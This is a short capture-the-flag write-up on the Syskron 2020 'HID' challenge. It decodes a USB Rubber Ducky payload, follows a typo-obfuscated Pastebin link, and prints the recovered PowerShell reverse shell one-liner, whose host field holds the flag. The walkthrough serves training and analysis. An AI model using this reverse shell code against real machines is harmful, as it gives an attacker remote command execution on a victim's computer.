#### Original Writeup - [https://github.com/CTSecUK/Syskron-Security-CTF-2020/blob/main/Write-ups/HID.md](https://github.com/CTSecUK/Syskron-Security-CTF-2020/blob/main/Write-ups/HID.md)

-----
# HID

 


## Details
***One of my colleagues found a USB stick in the parking lot in front of our company. Fortunately he handed it over directly to us . The drive contains an SD card with just one file. Maybe it's no normal USB flash drive?***

Firstly I started by going to "ducktoolkit.com" 

I chose the **Decode Payload** option 

I uploaded the file from my downloads folder [inject.bin] and then clicked **Decode** 

Once it had uploaded and the page refreshed i chose the option to Download [duckycode.txt] 

I opened up the [duckycode.txt] in Pluma and scrolled through the code and found a download string to a pastebin which looked suspicious\

I changed the incorrect character to look like a normal URL - https://pastebin.com/raw/YRD8jsvd and went to the website to see what was there.


I received a 404 error.

I went back over the code and noticed more spelling mistakes or letters that were in the wrong place. Like the below:-


**Copz and yip** stood out to me so I modified the URL, swapping Y to Z and tried that URL in the address bar - https://pastebin.com/raw/ZRD8jsvd

```
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10syskronCTF{y0u_f0und_m3}",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
The flag was hidden in the hostname/IP-address field.

Flag: ***syskronCTF{y0u_f0und_m3}***

Original writeup (https://github.com/CTSecUK).